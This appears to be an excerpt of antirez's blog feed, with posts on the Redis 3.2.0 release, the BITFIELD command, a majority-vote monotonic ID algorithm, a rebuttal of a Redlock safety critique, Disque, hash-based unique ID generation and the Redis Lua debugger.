* Sentinel can now scale monitoring many masters, but should be considered more an advanced beta than stable, so please test it in your environment carefully before deploying, a lot of code changed inside Sentinel internals.

* Many more things but this list is already long enough.

A big thank you to all the contributors that made this release possible, to the Redis user base which is lovely and encouraging, and to Redis Labs for sponsoring a lot of the work that went into 3.2.0.

During the previous weeks we also worked to a new interesting feature that will be released in the next versions of Redis, it will be announced during RedisConf 2016 in San Francisco, 10-11 May, so stay tuned!

One note about stability. I keep saying it all the time, but stability in software is not black and white. It’s like pink, yellow and green. No just kidding. It’s the usual shades of gray. So 3.2.0 looks solid, however it’s fresh meat. Start to use it incrementally and check how it works for you, and please report any issue promptly. However it’s also true that given that it stayed in RC for a lot of time, it was already tested by the brave users that were too much in need for the new features to deploy it ASAP.

The 3.2.0 full changelog is here: https://raw.githubusercontent.com/antirez/redis/3.2/00-RELEASENOTES

Redis 3.2.0 can be obtained as a tarball at http://download.redis.io, or by fetching the 3.2.0 tag from Github antirez/redis repository.

Enjoy! Comments]]>
http://antirez.com/news/104
100 more of those BITFIELDs http://antirez.com/news/103 http://antirez.com/news/103 Fri, 26 Feb 2016 15:02:54 +0000
The essence of this command is not new, it was proposed in the past by me and others, but never in a serious way, the idea always looked a bit strange. We already have bit operations in Redis: certain users love it, it’s a good way to represent a lot of data in a compact way. However so far we handle each bit separately, setting, testing, getting bits, counting all the bits that are set in a range, and so forth.

What about implementing bitfields? Short or large, arbitrary sized integers, at arbitrary offsets, so that I can use a Redis string as an array of 5 bits signed integers, without losing a single bit of juice.

A few days ago, Yoav Steinberg from Redis Labs, proposed a set of commands on arbitrary sized integers stored at bit offsets in a more serious way. I smiled when I read the email, since this was kinda of a secret dream. Starting from Yoav proposal and with other feedbacks from Redis Labs engineers, I wrote an initial specification of a single command with sub-commands, using short names for types definitions, and adding very fine grained control on the overflow semantics.

I finished the first implementation a few minutes ago, since the plan was to release it for today, in the hope Redis appreciates we do actual work in its bday.

The resulting BITFIELD command supports different subcommands:

SET — Set the specified value and return its previous value.
GET — Get the specified value.
INCRBY — Increment the specified counter.

There is an additional meta command called OVERFLOW, used to set (guess what) the overflow semantics of the commands that will follow (so OVERFLOW can be specified multiple times):

OVERFLOW SAT — Saturation, so that overflowing in one direction or the other, will saturate the integer to its maximum value in the direction of the overflow.
OVERFLOW WRAP — This is usual wrap around, but the interesting thing is that this also works for signed integers, by wrapping towards the most negative or most positive values.
OVERFLOW FAIL — In this mode the operation is not performed at all if the value would overflow.

The integer types can be specified using the “u” or “i” prefix followed by the number of bits, so for example u8, i5, u20 and i53 are valid types. There is a limitation: u64 cannot be specified since the Redis protocol is unable to return 64 bit unsigned integers currently.

It's time for a few examples: in order to increment an unsigned integer of 8 bits I could use:

127.0.0.1:6379> BITFIELD mykey incrby u8 100 1
1) (integer) 3

This is incrementing an unsigned integer, 8 bits, at offset 100 (101th bit in the bitmap).

However there is a different way to specify offsets, that is by prefixing the offset with “#”, in order to say: "handle the string as an array of counters of the specified size, and set the N-th counter". Basically this just means that if I use #10 with an 8 bits type, the offset is obtained by multiplying 8*10, this way I can address multiple counters independently without doing offsets math:

127.0.0.1:6379> BITFIELD mykey incrby u8 #0 1
1) (integer) 1
127.0.0.1:6379> BITFIELD mykey incrby u8 #0 1
1) (integer) 2
127.0.0.1:6379> BITFIELD mykey incrby u8 #1 1
1) (integer) 1
127.0.0.1:6379> BITFIELD mykey incrby u8 #1 1
1) (integer) 2

The ability to control the overflow is also interesting. For example an unsigned counter of 1 bit will actually toggle between 0 and 1 with the default overflow policy of “wrap”:

127.0.0.1:6379> BITFIELD mykey incrby u1 100 1
1) (integer) 1
127.0.0.1:6379> BITFIELD mykey incrby u1 100 1
1) (integer) 0
127.0.0.1:6379> BITFIELD mykey incrby u1 100 1
1) (integer) 1
127.0.0.1:6379> BITFIELD mykey incrby u1 100 1
1) (integer) 0

As you can see it alternates 0 and 1.

Saturation can also be useful:

127.0.0.1:6379> bitfield mykey overflow sat incrby i4 100 -3
1) (integer) -3
127.0.0.1:6379> bitfield mykey overflow sat incrby i4 100 -3
1) (integer) -6
127.0.0.1:6379> bitfield mykey overflow sat incrby i4 100 -3
1) (integer) -8
127.0.0.1:6379> bitfield mykey overflow sat incrby i4 100 -3
1) (integer) -8

As you can see, decrementing 3 never goes under -8.

Note that you can carry multiple operations in a single command. It always returns an array of results:

127.0.0.1:6379> BITFIELD mykey get i4 100 set u8 200 123 incrby u8 300 1
1) (integer) -8
2) (integer) 123
3) (integer) 7

The intended usage for this command is real time analytics, A/B testing, showing slightly different things to users every time by using the overflowing of integers. Packing so many small counters in a shared and memory efficient way can be exploited in many ways, but that’s left as an exercise for the talented programmers of the Redis community.

The command will be backported into the stable version of Redis in the next weeks, so this will be usable very soon.

Curious about the implementation? It's more complex you could expect probably: https://github.com/antirez/redis/commit/70af626d613ebd88123f87a941b0dd3570f9e7d2 Comments]]>
http://antirez.com/news/103
The binary search of distributed programming http://antirez.com/news/102 http://antirez.com/news/102 Sat, 13 Feb 2016 16:49:13 +0000
This apparently simple problem can be more complex than it looks at a first glance, considering that it must ensure that, in all the conditions, there is a safety property which is always guaranteed: the ID generated is always greater than all the past IDs generated, and the same ID cannot be generated multiple times. This must hold during network partitions and other failures. The system may just become unavailable if there are less than the majority of nodes that can be reached, but never provide the wrong answer (note: as we'll see this algorithm has another liveness issue that happens during high load of requests).

So for the sake of playing a bit more with distributed systems algorithms, and learn a bit more in the process, I tried to find a solution.
Actually I was aware of an algorithm that could solve the problem. It’s an inefficient one, not suitable to generate tons of IDs per second. Many complex distributed algorithms, like Raft and Paxos, use it as a step in order to get monotonically increasing IDs, as a foundation to mount the full set of properties they need to provide. This algorithm is fascinating since it’s extremely easy to understand and implement, and because it’s very intuitive to understand *why* it works. I could say, it is the binary search of distributed algorithms, something easy enough but smart enough to let newcomers to distributed programming to have an ah!-moment.

However I had to modify the algorithm in order to adapt it to be implemented in the client side. Hopefully it is still correct (feedbacks appreciated). While I’m not going to use this algorithm in order to improve Redlock (see my previous blog post), I think that trying to solve this kind of problems is both a good exercise, and it may be an interesting read for people approaching distributed systems for the first times looking for simple problems to play with in real world systems.

## How it works?

The algorithm requirements are the following two:

1. A data store that supports the operation set_if_less_than().

2. A data store that can fsync() data to disk on writes, before replying to the client.

The above includes almost any *SQL server, Redis, and a number of other stores.

We have a set of N nodes, let’s assume N = 5 for simplicity in order to explain the algorithm.
We initialize the system by setting a key called “current” to the value of 0, so in Redis terms, we do:

SET current 0

In all the 5 instances. This is part of the initialization and must be done only when a new “cluster” is initialized. This step can be skipped but makes the explanation simpler.

In order to generate a new ID, this is what we do:

1: Get the “current” value from the majority of instances (3 or more if N=5).

2: If we failed to reach 3 instances, GOTO 1.

3: Get the maximum value among the ones we obtained, and increment it by 1. Let’s call this $NEXTID

4: Send the following write operation to all the nodes we are able to reach.

IF current < $NEXTID THEN
SET current $NEXTID
return $NEXTID
ELSE
return NULL
END

5: If 3 or more instances will reply $NEXTID, the algorithm succeeded, and we successfully generated a new monotonically increasing ID.

6: Otherwise, if we have not reached the majority, GOTO 1.

What we send at step 4 can be easily translated to a simple Redis Lua script:

local val = tonumber(redis.call('get',KEYS[1]))
local nextid = tonumber(ARGV[1])

if val < nextid then
redis.call('set',KEYS[1],nextid)
return nextid
else
return nil
end

## Is it safe?

The reason why I intuitively believe that it works, other than the fact that, in a modified form is used as a step in deeply analyzed algorithms, is that:

If we are able to obtain the majority of “votes”, it is impossible by definition that any other client obtained the majority for an ID greater or equal to the one we generated. Otherwise there were already 3 or more instances with a value of current >= $NEXTID, and it would be impossible for us to get the majority. So the IDs generated are always greater than the past IDs, and for the same condition it is impossible for two instances to generate the same ID.

Maybe some kind reader could point to a bug in the algorithm or to an analysis of this algorithm as used in other analyzed systems, however given that the above is adapted to be executed client-side, there are actually more processes involved and it should be re-analyzed in order to provide a proof that it is equivalent.

## Why it’s a slow algorithm?

The problem with this algorithm is concurrent accesses. If many clients are trying to generate new IDs at the same time, nobody may get the majority, and they will need to retry again, with larger numbers. Note that this also means that there could be “holes” in the sequence of generated IDs, so the clients could be able to generate the sequence 1, 2, 6, 10, 11, 21, … Because many numbers could be “burn” by the split brain condition caused by concurrent access.

(Note that in the above sentence "split brain" does not mean that there is an inconsistent state between the nodes, just that it was not possible to reach the majority to agree about a given ID. Usually split brain refers to a conflict in the configuration where, for example, multiple nodes claim to be a master. However in the Raft paper the term split brain is used with the same meaning I'm using here).

How many IDs per second you can generate without incurring frequent failures due to concurrent accesses depends on the network RTT and number of concurrent clients. What’s interesting however is that you can make the algorithm more scalable by creating an “IDs server” that talks to the cluster, and mediates the access of the clients by serializing the generation of the new IDs one after the other. This does not create a single point of failure since you don’t need to have a single ID server, you can run a few for redundancy, and have hundreds of clients connecting to it.

Using this schema to generate 5k IDs/sec, should be viable, especially if the client is implemented in a smart way, trying to send the requests to the 5 nodes at the same time, using some multiplexing or threaded approach.

Another approach when there are many clients and no node mediating the access is to use randomized and exponential delays to contact the nodes again, if a round of the algorithm failed.

## Why fsync is needed?

Here fsync at every write is mandatory because if nodes go down and restart, they MUST have the latest value of the “current” key. If the value of current returns backward, it is possible to violate our safety property that states that the newly generated IDs are always greater than any other ID generated in the past. However if you use a full replicated FSM to achieve the same goal, you need fsync anyway (but you don’t have the problem of the concurrent accesses. For example using Raft in normal conditions you have a single leader you can send requests to).

So, in the case of Redis, it must be configured with AOF enabled and the AOF fsync policy set to always, to make sure the write is always persisted before to reply to the client.

## What do I do with those IDs

A set of IDs like that, have a property which is called “total ordering”, so they are very useful in different contexts. Usually it is hard with distributed computations to say what happened before and what happened after. Using those IDs you always know the order of certain events.

To give you a simple example: different processes, using this system, may compute a list of items, and take each sub-list in their local storage. At the end, they could merge the multiple lists and get a final list in the right order, as if there was a single shared list since the start where each process was able to append an item.

## Origins of this algorithm

What described here closely resembles both Paxos first phase and Raft leader election. However it seems just a special case of Lamport timestamp where the majority is used in order to create total ordering.

Many thanks to Max Neunhoeffer and Martin Kleppmann for feedbacks about the initial draft of this blog post. Note that any error is mine. Comments]]>
http://antirez.com/news/102
Is Redlock safe? http://antirez.com/news/101 http://antirez.com/news/101 Tue, 09 Feb 2016 15:33:51 +0000
Redlock is a client side distributed locking algorithm I designed to be used with Redis, but the algorithm orchestrates, client side, a set of nodes that implement a data store with certain capabilities, in order to create a multi-master fault tolerant, and hopefully safe, distributed lock with auto release capabilities.
You can implement Redlock using MySQL instead of Redis, for example.

The algorithm's goal was to move away people that were using a single Redis instance, or a master-slave setup with failover, in order to implement distributed locks, to something much more reliable and safe, but having a very low complexity and good performance.

Since I published Redlock people implemented it in multiple languages and used it for different purposes.

Martin's analysis of the algorithm concludes that Redlock is not safe. It is great that Martin published an analysis, I asked for an analysis in the original Redlock specification here: http://redis.io/topics/distlock. So thank you Martin. However I don’t agree with the analysis. The good thing is that distributed systems are, unlike other fields of programming, pretty mathematically exact, or they are not, so a given set of properties can be guaranteed by an algorithm or the algorithm may fail to guarantee them under certain assumptions. In this analysis I’ll analyze Martin's analysis so that other experts in the field can check the two documents (the analysis and the counter-analysis), and eventually we can understand if Redlock can be considered safe or not.

Why Martin thinks Redlock is unsafe
-----------------------------------

The arguments in the analysis are mainly two:

1. Distributed locks with an auto-release feature (the mutually exclusive lock property is only valid for a fixed amount of time after the lock is acquired) require a way to avoid issues when clients use a lock after the expire time, violating the mutual exclusion while accessing a shared resource. Martin says that Redlock does not have such a mechanism.

2. Martin says the algorithm is, regardless of problem “1”, inherently unsafe since it makes assumptions about the system model that cannot be guaranteed in practical systems.

I’ll address the two concerns separately for clarity, starting with the first “1”.

Distributed locks, auto release, and tokens
-------------------------------------------

A distributed lock without an auto release mechanism, where the lock owner will hold it indefinitely, is basically useless. If the client holding the lock crashes and does not recover with full state in a short amount of time, a deadlock is created where the shared resource that the distributed lock tried to protect remains forever unaccessible. This creates a liveness issue that is unacceptable in most situations, so a sane distributed lock must be able to auto release itself.

So practical locks are provided to clients with a maximum time to live. After the expire time, the mutual exclusion guarantee, which is the *main* property of the lock, is gone: another client may already have the lock. What happens if two clients acquire the lock at two different times, but the first one is so slow, because of GC pauses or other scheduling issues, that will try to do work in the context of the shared resource at the same time with second client that acquired the lock?

Martin says that this problem is avoided by having the distributed lock server to provide, with every lock, a token, which is, in his example, just a number that is guaranteed to always increment. The rationale for Martin's usage of a token, is that this way, when two different clients access the locked resource at the same time, we can use the token in the database write transaction (that is assumed to materialize the work the client does): only the client with the greatest lock number will be able to write to the database.

In Martin's words:

“The fix for this problem is actually pretty simple: you need to include a fencing token with every write request to the storage service. In this context, a fencing token is simply a number that increases (e.g. incremented by the lock service) every time a client acquires the lock”

… snip …

“Note this requires the storage server to take an active role in checking tokens, and rejecting any writes on which the token has gone backwards”.

I think this argument has a number of issues:

1. Most of the times when you need a distributed lock system that can guarantee mutual exclusivity, when this property is violated you already lost. Distributed locks are very useful exactly when we have no other control in the shared resource. In his analysis, Martin assumes that you always have some other way to avoid race conditions when the mutual exclusivity of the lock is violated. I think this is a very strange way to reason about distributed locks with strong guarantees, it is not clear why you would use a lock with strong properties at all if you can resolve races in a different way. Yet I’ll continue with the other points below just for the sake of showing that Redlock can work well in this, very artificial, context.

2. If your data store can always accept the write only if your token is greater than all the past tokens, than it’s a linearizable store. If you have a linearizable store, you can just generate an incremental ID for each Redlock acquired, so this would make Redlock equivalent to another distributed lock system that provides an incremental token ID with every new lock. However in the next point I’ll show how this is not needed.

3. However “2” is not a sensible choice anyway: most of the times the result of working to a shared resource is not writing to a linearizable store, so what to do? Each Redlock is associated with a large random token (which is generated in a way that collisions can be ignored. The Redlock specification assumes textually “20 bytes from /dev/urandom”). What do you do with a unique token? For example you can implement Check and Set. When starting to work with a shared resource, we set its state to “``”, then we operate the read-modify-write only if the token is still the same when we write.

4. Note that in certain use cases, one could say, it’s useful anyway to have ordered tokens. While it’s hard to think at an use case, note that for the same GC pauses Martin mentions, the order in which the token was acquired, does not necessarily respects the order in which the clients will attempt to work on the shared resource, so the lock order may not be casually related to the effects of working to a shared resource.

5. Most of the times, locks are used to access resources that are updated in a way that is non transactional. Sometimes we use distributed locks to move physical objects, for example. Or to interact with another external API, and so forth.

I want to mention again that, what is strange about all this, is that it is assumed that you always must have a way to handle the fact that mutual exclusion is violated. Actually if you have such a system to avoid problems during race conditions, you probably don’t need a distributed lock at all, or at least you don’t need a lock with strong guarantees, but just a weak lock to avoid, most of the times, concurrent accesses for performances reasons.

However even if you happen to agree with Martin about the fact the above is very useful, the bottom line is that a unique identifier for each lock can be used for the same goals, but is much more practical in terms of not requiring strong guarantees from the store.

Let’s talk about system models
------------------------------

The above criticism is basically common to everything which is a distributed lock with auto release, not providing a monotonically increasing counter with each lock. However the other critique of Martin is specific to Redlock. Here Martin really analyzes the algorithm, concluding it is broken.

Redlock assumes a semi synchronous system model where different processes can count time at more or less the same “speed”. The different processes don’t need in any way to have a bound error in the absolute time. What they need to do is just, for example, to be able to count 5 seconds with a maximum of 10% error. So one counts actual 4.5 seconds, another 5.5 seconds, and we are fine.

Martin also states that Redlock requires bound messages maximum delays, which is not correct as far as I can tell (I’ll explain later what’s the problem with his reasoning).

So let’s start with the issue of different processes being unable to count time at the same rate.

Martin says that the clock can randomly jump in a system because of two issues:

1. The system administrator manually alters the clock.

2. The ntpd daemon changes the clock a lot because it receives an update.

The above two problems can be avoided by “1” not doing this (otherwise even corrupting a Raft log with “echo foo > /my/raft/log.bin” is a problem), and “2” using an ntpd that does not change the time by jumping directly, but by distributing the change over the course of a larger time span.

However I think Martin is right that Redis and Redlock implementations should switch to the monotonic time API provided by most operating systems in order to make the above issues less of a problem. This was proposed several times in the past, adds a bit of complexity inside Redis, but is a good idea: I’ll implement this in the next weeks. However while we’ll switch to monotonic time API, because there are advantages, processes running in an operating system without a software (time server) or human (system administrator) elements altering the clock, *can* count relative time with a bound error even with gettimeofday().

Note that there are past attempts to implement distributed systems even assuming a bound absolute time error (by using GPS units). Redlock does not require anything like that, just the ability of different processes to count 10 seconds as 9.5 or 11.2 (+/- 2 seconds max in the example), for instance.

So is Redlock safe or not? It depends on the above. Let’s assume we use the monotonically increasing time API, for the sake of simplicity to rule out implementation details (system administrators with a love for POKE and time servers). Can a process count relative time with a fixed percentage of maximum error? I think this is a sounding YES, and is simpler to reply yes to this than to: “can a process write a log without corrupting it”?

Network delays & co
-------------------

Martin says that Redlock does not just depend on the fact that processes can count time at approximately the same time, he says:

“However, Redlock is not like this. Its safety depends on a lot of timing assumptions: it assumes that all Redis nodes hold keys for approximately the right length of time before expiring; that that the network delay is small compared to the expiry duration; and that process pauses are much shorter than the expiry duration.”

So let’s split the above claims into different parts:

1. Redis nodes hold keys for approximately the right length of time.

2. Network delays are small compared to the expiry duration.

3. Process pauses are much shorter than the expiry duration.

All the time Martin says that “the system clock jumps” I assume that we covered this by not poking with the system time in a way that is a problem for the algorithm, or for the sake of simplicity by using the monotonic time API. So:

About claim 1: This is not an issue, we assumed that we can count time approximately at the same speed, unless there is any actual argument against it.

About claim 2: Things are a bit more complex. Martin says:

“Okay, so maybe you think that a clock jump is unrealistic, because you’re very confident in having correctly configured NTP to only ever slew the clock.” (Yep we agree here ;-) he continues and says…)

“In that case, let’s look at an example of how a process pause may cause the algorithm to fail:
Client 1 requests lock on nodes A, B, C, D, E.
While the responses to client 1 are in flight, client 1 goes into stop-the-world GC.
Locks expire on all Redis nodes.
Client 2 acquires lock on nodes A, B, C, D, E.
Client 1 finishes GC, and receives the responses from Redis nodes indicating that it successfully acquired the lock (they were held in client 1’s kernel network buffers while the process was paused).
Clients 1 and 2 now both believe they hold the lock.”

If you read the Redlock specification, that I hadn't touched for months, you can see the steps to acquire the lock are:

1. Get the current time.

2. … All the steps needed to acquire the lock …

3. Get the current time, again.

4. Check if we are already out of time, or if we acquired the lock fast enough.

5. Do some work with your lock.

Note steps 1 and 3. Whatever delay happens in the network or in the processes involved, after acquiring the majority we *check again* that we are not out of time. The delay can only happen after steps 3, resulting into the lock to be considered ok while actually expired, that is, we are back at the first problem Martin identified of distributed locks where the client fails to stop working to the shared resource before the lock validity expires. Let me tell again how this problem is common with *all the distributed locks implementations*, and how the token as a solution is both unrealistic and can be used with Redlock as well.

Note that whatever happens between 1 and 3, you can add the network delays you want, the lock will always be considered not valid if too much time elapsed, so Redlock looks completely immune from messages that have unbound delays between processes. It was designed with this goal in mind, and I cannot see how the above race condition could happen.

Yet Martin's blog post was also reviewed by multiple DS experts, so I’m not sure if I’m missing something here or simply the way Redlock works was overlooked simultaneously by many. I’ll be happy to receive some clarification about this.

The above also addresses “process pauses” concern number 3. Pauses during the process of acquiring the lock don’t have effects on the algorithm's correctness. They can however, affect the ability of a client to make work within the specified lock time to live, as with any other distributed lock with auto release, as already covered above.

Digression about network delays
---

Just a quick note. In server-side implementations of a distributed lock with auto-release, the client may ask to acquire a lock, the server may allow the client to do so, but the process can stop into a GC pause or the network may be slow or whatever, so the client may receive the "OK, the lock is your" too late, when the lock is already expired. However you can do a lot to avoid your process sleeping for a long time, and you can't do much to avoid network delays, so the steps to check the time before/after the lock is acquired, to see how much time is left, should actually be common practice even when using other systems implementing locks with an expiry.

Fsync or not?
-------------

At some point Martin talks about the fact that Redlock uses delayed restarts of nodes. This requires, again, the ability to be able to wait more or less a specified amount of time, as covered above. Useless to repeat the same things again.

However what is important about this is that, this step is optional. You could configure each Redis node to fsync at every operation, so that when the client receives the reply, it knows the lock was already persisted on disk. This is how most other systems providing strong guarantees work. The very interesting thing about Redlock is that you can opt-out any disk involvement at all by implementing delayed restarts. This means it’s possible to process hundreds of thousands locks per second with a few Redis instances, which is something impossible to obtain with other systems.

GPS units versus the local computer clock
-----------------------------------------

Returning to the system model, one thing that makes Redlock system model practical is that you can assume a process to never be partitioned with the system clock. Note that this is different compared to other semi synchronous models where GPS units are used, because there are two non obvious partitions that may happen in this case:

1. The GPS is partitioned away from the GPS network, so it can’t acquire a fix.

2. The process and the GPS are not able to exchange messages or there are delays in the messages exchanged.

The above problems may result into a liveness or safety violation depending on how the system is orchestrated (safety issues only happen if there is a design error, for example if the GPS updates the system time asynchronously so that, when the GPS does not work, the absolute time error may go over the maximum bound).

The Redlock system model does not have these complexities nor requires additional hardware, just the computer clock, and even a very cheap clock with all the obvious biases due to the crystal temperature and other things influencing the precision.

Conclusions
-----------

I think Martin has a point about the monotonic API, Redis and Redlock implementations should use it to avoid issues due to the system clock being altered. However I can’t identify other points of the analysis affecting Redlock safety, as explained above, nor do I find his final conclusions that people should not use Redlock when the mutual exclusion guarantee is needed, justified.

It would be great to both receive more feedbacks from experts and to test the algorithm with Jepsen, or similar tools, to accumulate more data.

A big thank you to the friends of mine that helped me to review this post. Comments]]>
http://antirez.com/news/101
Disque 1.0 RC1 is out! http://antirez.com/news/100 http://antirez.com/news/100 Sat, 02 Jan 2016 15:26:07 +0000
If you don't know what Disque is, the best starting point is to read the README in the Github project page at http://github.com/antirez/disque.

Disque is a just piece of software, so it has a material value which can be zero or more, depending on its ability to make useful things for people using it. But for me there is an huge value that goes over what Disque, materially, is. It is the value of designing and doing something you care about. It’s the magic of programming: where there was nothing, now there is something that works, that other people may potentially analyze, run, use.

Distributed systems are a beautiful field. Thanks to Redis, and to the people that tried to mentor me in a way or the other, I got exposed to distributed systems. I wanted to translate this love to something tangible. A new, small system, designed from scratch, without prejudices and without looking too closely to what other similar systems were doing. The experience with Redis shown me that message brokers were a very interesting topic, and that in some way, they are the perfect topic to apply DS concepts. I even pretend message brokers can be fun and exciting. So I tried to design a new message queue, and Disque is the result.

Disque design goal is to provide a system with a good user experience: to provide certain guarantees in the context of messaging, guarantees which are easy to reason about, and to provide extreme operational simplicity. The RC1 offers the foundation, but there is more work to do. For once I hope that Disque will be tested by Aphyr with Jepsen in depth. Since Disque is a system that provides certain kinds of guarantees that can be tested, if it fails certain tests, this translates directly to some bug to fix, that means to end with a better system.

On the operational side there is to test it in the real world. AP and message queues IMHO are a perfect match to provide operational robustness. However I’m not living into the illusion that I got everything right in the first release, so it will take months (or years?) of iteration to *really* reach the operational simplicity I’m targeting. Moreover this is an RC1 that was heavily modified in the latest weeks, I expect it to have a non trivial amount of bugs.

From the point of view of making a fun and exciting system, I tried to end with a simple and small API that does not force the user to think at the details of *this specific* implementation, but more generally at the messaging problem she or he got. Disque also has a set of introspection capabilities that should help making it a non-opaque system that is actually possible to debug and observe.

Even with all the limits of new code and ideas, the RC release is a great first step, and I’m glad Disque is not in the list of side projects that we programmers start and never complete.

I was not alone during the past months, while hacking with Disque and trying to figure out how to shape it, I received the help of: He Sun, Damian Janowski, Josiah Carlson, Michel Martens, Jacques Chester, Kyle Kingsbury, Mark Paluch, Philipp Krenn, Justin Case, Nathan Fritz, Marcos Nils, Jasper Louis Andersen, Vojtech Vitek, Renato C., Sebastian Waisbrot, Redis Labs and Pivotal, and probably more people I’m not remembering right now. Thank you for your help.

The RC1 is tagged in the Disque Github repository. Have fun! Comments]]>
http://antirez.com/news/100
Generating unique IDs: an easy and reliable way http://antirez.com/news/99 http://antirez.com/news/99 Sat, 21 Nov 2015 14:47:01 +0000
The post was one of the top news on Hacker News today. It’s pretty clear and informative from the point of view of how Math.random() is broken and how should be fixed, so I’ve nothing to add to the matter itself. But since the author discovered the weakness of the PRNG in the context of generating large probably-non-colliding IDs, I want to share with you an alternative that I used multiple times in the past, which is fast and extremely reliable.

The problem of unique IDs
- - -

So, in theory, if you want to generate unique IDs you need to store some state that makes sure an ID is never repeated. In the trivial case you may use just a simple counter. However the previous ID generated must be stored in a consistent way. In case of restart of the system, it should never happen that the same ID is generated again because our stored counter was not correctly persisted on disk.

If we want to generate unique IDs using multiple processes, each process needs to make sure to prepend its IDs with some process-specific prefix that will never collide with another process prefix. This can be complex to manage as well. The simple fact of having to store in a reliable way the old ID is very time consuming when we want to generate an high number of IDs per second.

Fortunately there is a simple solution. Generate a random number in a range between 0 and N, with N so big that the probability of collisions is so small to be, for every practical application, irrelevant.
This works if the number we generate is uniformly distributed between 0 and N. If this prerequisite is true we can use the birthday paradox in order to calculate the probability of collisions.

By using enough bits it’s trivial to make the probability of a collision billions of times less likely than an asteroid centering the Earth, even if we generate millions of IDs per second for hundreds of years.
If this is not enough margin for you, just add more bits, you can easily reach an ID space larger than the number of atoms in the universe.

This generation method has a great advantage: it is completely stateless. Multiple nodes can generate IDs at the same time without exchanging messages. Moreover there is nothing to store on disk so we can go as fast as our CPU can go. The computation will easily fit the CPU cache. So it’s terribly fast and convenient.

Mike Malone was using this idea, by using the PRNG in order to create an ID composed of a set of characters, where each character was one of 64 possible characters. In order to create each character the weak V8 PRNG was used, resulting into collisions. Remember that our initial assumption is that each new ID must be selected uniformly in the space between 0 and N.

You can fix this problem by using a stronger PRNG, but this requires an analysis of the PRNG. Another problem is seeding, how do you start the process again after a restart in order to make sure you don’t pick the initial state of the PRNG again? Otherwise your real ID space is limited by the seeding of the PRNG, not the output space itself.

For all the above reasons I want to show you a trivial technique that avoids most of these problems.

Using a crypto hash function to generate unique IDs
- - -

Cryptographic hash functions are non invertible functions that transform a sequence of bits into a fixed sequence of bits. They are designed in order to resist a variety of attacks, however in this application we only rely on a given characteristic they have: uniformity of output. Changing a bit in the input of the hash function will result in each bit of the output to change with a 50% probability.

In order to have a reliable seed, we use some help from the operating system, by querying /dev/urandom. Seeding the generator is a moment where we really want some external entropy, otherwise we really risk of doing some huge mistake and generating the same sequence again.

As an example of crypto hash function we'll use the well known SHA1, that has an output of 160 bits. Note that you could use even MD5 sum for this application: the vulnerabilities it has have no impact in our usage here.

We start creating a seed, by reading 160 bits from /dev/urandom. In pseudocode it will be something like:

seed = devurandom.read(160/8)

We also initialize a counter:

counter = 0

Now this is the function that will generate every new ID:

function get_new_id()
myid = SHA1(string(counter) + seed)
counter = counter + 1
return myid
end

Basically we have a fixed string, which is our seed, and we hash it with a progressive counter, so if our seed is “foo”, we output new IDs as:

SHA1(“0foo”)
SHA1(“1foo”)
SHA1(“2foo”)

This is already good for our use case. However we may also need that our IDs are not easy to predict. In order to make the IDs very hard to predict instead of using SHA1 in the get_new_id() function, just use SHA1_HMAC() instead, where the seed is the secret, and the counter the message of the HMAC.

This method is fast, has guaranteed good distribution, so collisions will be as hard as predicted by the birthday paradox, there is no analysis needed on the PRNG, and is completely stateless.

I use it on my Disque project in order to generate message IDs among multiple nodes in a distributed system.

Hacker News thread here: https://news.ycombinator.com/item?id=10606910 Comments]]>
http://antirez.com/news/99
6 years of commit visualized http://antirez.com/news/98 http://antirez.com/news/98 Fri, 20 Nov 2015 10:58:34 +0000
Full size image here: http://antirez.com/misc/commitsvis.png

!~!

Each commit is a rectangle. The height is the number of affected lines (a logarithmic scale is used). The gray labels show release tags.

There are little surprises since the amount of commit remained pretty much the same over the time, however now that we no longer backport features back into 3.0 and future releases, the rate at which new patchlevel versions are released diminished.

Major releases look more or less evenly spaced between 2.6, 2.8 and 3.0, but were more frequent initially, something that should change soon as we are trying to switch to time-driven releases with 3 new major release each year (that obviously will contain less new things compared to the amount of stuff was present in major releases that took one whole year).
For example 3.2 RC is due for December 2015.

Patch releases of a given major release tend to have a logarithmic curve shape. As a release mature, in general it gets less critical bugs. Also attention shifts progressively to the new release.

I would love Github to give us stuff like that and much more. There is a lot of data in commits of a project that is there for years. This data should be analyzed and explored... it's a shame that the graphics section is apparently the same thing for years.

EDIT: The Tcl script used to generate this graph is here: https://github.com/antirez/redis/tree/unstable/utils/graphs/commits-over-time Comments]]>
http://antirez.com/news/98
Recent improvements to Redis Lua scripting http://antirez.com/news/97 http://antirez.com/news/97 Thu, 19 Nov 2015 11:23:27 +0000
1. A proper debugger for Redis Lua scripts.
2. Replication, and storage on the AOF, of Lua scripts as a set of write commands materializing the *effects* of the script, instead of replicating the script itself as we normally do.

The second feature is not just a matter of how scripts are replicated, but also touches what you can do with Lua scripting as we will see later.

Back from London, I implemented both the features. This blog post describes both, giving a few hints about the design and implementation aspects that may be interesting for the readers.

A proper Lua debugger
---

Lua scripting was initially conceived in order to write really trivial scripts. Things like: if the key exists do this. A couple of lines in order to avoid bloating Redis with all the possible variations of commands. Of course users did a lot more with it, and started to write complex scripts: from quad-tree implementations to full featured messaging systems with non trivial semantics. Lua scripting makes Redis programmable, and usually programmers can’t resist to programmable things. It helps that all the Lua scripts run using the same interpreter and are cached, so they are very fast. It is most of the time possible to do a lot more with a Redis instance by using Lua scripting, both functionally and in terms of operations per second. So complex scripts totally have their place today. We went from a very cold reception of the scripting feature (something as dynamic as a script sent to a database!), to mass usage, to writing complex scripts in a matter of a few years.

However writing simple scripts and writing complex scripts is a completely different matter. Bigger programs become exponentially more complex, and you can feel this even when going from 10 to 200 lines of code. While you can debug by brute force any simple script, just trying a few variants and observing the effects on the data set, or putting a few logging instructions in the middle, with complex scripts you have a bad time without a debugger.

My colleague Itamar Haber used a lot of his time to write complex scripts recently. At some point he also wrote some kind of debugger for Redis Lua scripting using the Lua debug library. This debugger no longer works since the debug library is now no longer exposed to scripts, for sandboxing concerns, and in general, what you want in a Redis debugger is an interactive and remote debugger, with a proper client able to work alongside with the server, to provide a good debugging experience. Debugging is already a lot of hard work, to have solid tools is really a must. The only way to accomplish this result, was to add proper debugging support inside Redis itself.

So back from London Itamar and I started to talk about what a debugger should export to the user in order to be kinda of useful, and a real upgrade compared to the past. It was also discussed to just add support for the Lua debuggers that already exist outside the Redis ecosystem. However I strongly believe the user experience is enhanced when everything is designed specifically to work well with Redis, so in the end I decided to wrote the debugger from scratch. A few things were sure: we needed a remote debugger where you could attach to Redis, start a debugging session, have good observability of what the script was doing with the Redis dataset. A special concern of mine was to have colorized output, of course ;-) I wanted to make debugging a fun experience, and to have a very fast learning curve, which are related.

